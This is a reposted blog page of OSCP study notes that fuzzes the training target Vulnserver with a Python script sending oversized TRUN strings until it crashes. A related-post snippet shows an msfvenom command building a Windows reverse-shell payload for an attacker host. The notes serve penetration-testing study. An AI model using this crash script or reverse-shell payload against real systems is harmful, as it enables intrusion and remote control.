OSCP Learning Notes - Buffer Overflows(1)

最新推荐文章于 2025-08-08 11:09:55 发布
最新推荐文章于 2025-08-08 11:09:55 发布
阅读量195 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: python
原文链接:http://www.cnblogs.com/keepmoving1113/p/11074706.html
博客介绍了缓冲区溢出相关内容,包括内存和栈的剖析、模糊测试。还提及了测试工具Vulnserver和Immunity Debuger。详细说明了在Windows系统打开Vulnserver程序,从Kali Linux连接并编写Python模糊测试脚本,最终导致Vulnserver崩溃的测试过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Introduction to Buffer Overflows

Anatomy of Memory

Anatomy of the Stack

Fuzzing

Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver

           Immunity Debuger - https://www.immunityinc.com/products/debugger/

Vulnserver Test

1. Open the vulnserver program on windows os.

2. Connect to the vulnserver from Kali Linux.

nc -nv 10.0.0.XX 9999

 

3.Write the Python fuzzer test script on Kali Linux

 1 #!/usr/bin/python
 2 import socket
 3 import sys
 4 
 5 buffer=["A"]
 6 counter=100
 7 while len(buffer) <= 30:
 8     buffer.append("A"*counter)
 9     counter=counter+200
10 
11 for string in buffer:
12     print "Fuzzing vulnserver with %s bytes" % len(string)
13     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
14     connect=s.connect(('10.0.0.XX',9999))
15     s.send('TRUN /.:/' + string)
16     s.close()

Grant the rights to the script file and execute the fuzzer.py.

chmod 777 fuzzer.py
./fuzzer.py

The vulnserver crashed with 5900 bytes.

Immunity Debuger

 GUI Screenshoot

 

Open or attach the vulnserver program.

 

Perform the fuzzer.py on Kali Linux.

./fuzzer.py

 

The vulnserver crashed finally.

 

转载于:https://www.cnblogs.com/keepmoving1113/p/11074706.html

OSCP Challenge 1 - Medtech
xiaochan_sara的博客
04-09 1128
OSCP Challenge 1 - Medtech write up
Buffer-OverFlow-Prep:OSCP的缓冲区溢出准备
04-06
缓冲区溢出 OSCP的缓冲区溢出准备
Overflow-OSCP
一个安全路上的菜鸟
10-21 681
靶场地址:https://www.vulnhub.com/entry/overflow-1,300/ 推荐使用Virtualbox ,如使用其它-网络可能会有问题。 只开发80,1337端口,网页提示 不需要目录爆破,下载文件 32位 elf 可执行文件 各项安全属性都未开启/ 执行文件测试一下 。绑定本地1337端口,目标服务也开设此端口也就是目前分析的程序。 直接上IDA 静态分析 i...
Buffer-Overflows:缓冲区溢出漏洞利用介绍
06-18
缓冲区溢出简介 作为我大学计算机安全课程的第一个项目,我的任务是在三个不同的简单程序上查找和利用缓冲区溢出漏洞。 先决条件 在深入研究缓冲区溢出之前,您应该熟悉: 基本的 C/C++ 理解。 Linux 权限。 基本装配知识。 GDB 和程序内存分配(堆栈、帧)。 GNU 项目调试器(又名 GDB)特别有用,因为我不会详细介绍如何使用它,如果您不熟悉,请查看文档或任何好的教程。 对本项目有用的部分有:反汇编程序,检查变量内容,打印saved return address等帧信息。 现在您可以开始阅读有关缓冲区溢出的。 场景 同一台 Linux 机器上还有其他三个用户,因此 /home 目录如下所示: jason@linux /home $ ls hyperuser jason masteruser superuser 每个用户(超级用户、超级用户、主用户)在他们的主目录中都
OSCP Learning Notes - Buffer Overflows(5)
weixin_30786657的博客
07-01 260
Generating Shellcode & Gaining Root 1.Generate the shellcode on Kali Linux. LHOST is the IP of Kali Linux. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.XXX LPORT=4444 EXITFUNC=thread -f ...
OSCP Learning Notes - Buffer Overflows(2)
weixin_30814223的博客
06-26 656
Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5900 2.Write the python test sc...
OSCP Learning Notes - Buffer Overflows(4)
weixin_30920091的博客
07-01 129
Finding the Right Module(mona) Mona Module Project website:https://github.com/corelan/mona 1. Download mona.py, and drop it into the 'OyCommands' file. 2. Open the vulnserver and Immnity Debugg...
OSCP Learning Notes - Enumeration(1)
weixin_30279751的博客
06-22 144
Installing Kioptrix: Level 1 Download the vm machine formhttps://www.vulnhub.com/entry/kioptrix-level-1-1,22/. In the Kali Linux: Find the devices in the intranet using the following command: n...
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-OSCP-PWK-Notes-Public:Optixal的进攻性安全认证专家(OSCP)/KaliLinux(PWK)
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-oscp-notes:oscp-notes
06-05
java网站源码OSCP - PWK(使用 Kali 进行渗透测试)注意事项 完成整个 OSCP 课程的完整 OSCP 笔记 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH...
anaconda 镜像源清华源问题解决
qq_19716091的博客
08-08 137
文件位置‪ C:\Users\用户\.condarc。用清华源时出现的如下图的问题。可以更换为中科大的镜像源。.condarc内容。
JumpServer 堡垒机全流程搭建指南及常见问题解决方案
2401_83649605的博客
08-05 1443
文章详细介绍了JumpServer的技术架构和部署流程,包括基础环境配置、数据库安装等步骤。JumpServer采用分布式架构,支持多机房部署,无资产数量和并发限制,是企业IT安全运维的理想选择。
WebSocket 在多线程环境下处理 Session并发
TOOZOOY的博客
08-07 654
WebSocket 在多线程环境下处理 Session并发时,常见问题包括状态冲突(如 IllegalStateException)、消息乱序、连接超时等。以下是综合各技术方案的解决方案,分为单机多线程和分布式集群两类场景:
【紧急预警】NVIDIA Triton推理服务器漏洞链可导致RCE!
athink_cn的博客
08-05 622
NVIDIA 的 Triton 推理服务器中存在一系列严重漏洞,这是一个用于大规模运行 AI 模型的流行开源平台。当这些缺陷链接在一起时,远程、未经身份验证的攻击者可能会完全控制服务器,从而实现远程代码执行 (RCE)。
Python 属性描述符(方法是描述符)
最新发布
钢铁男儿
08-08 154
❶ Text 实例的 repr 方法返回一个类似 Text 构造方法调用的字符串,❸ 如果为 obj.spam 赋值,会遮盖类属性,导致无法通过 obj 实例访。在类中定义的函数属于绑定方法(bound method),因为用户定义的函。下面来分析 Text.reverse 方法,如示例 20-15 所示。❹ 注意类型是不同的,一个是 function,一个是 method。象,里面包装着函数,并把托管实例(例如 obj)绑定给函数的第一个。方法,因此是非覆盖型描述符,如示例 20-13 中。
tkwebview-tkinter的web视图
tinga_kilin的博客
08-06 731
tkinter的web视图
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-优快云博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值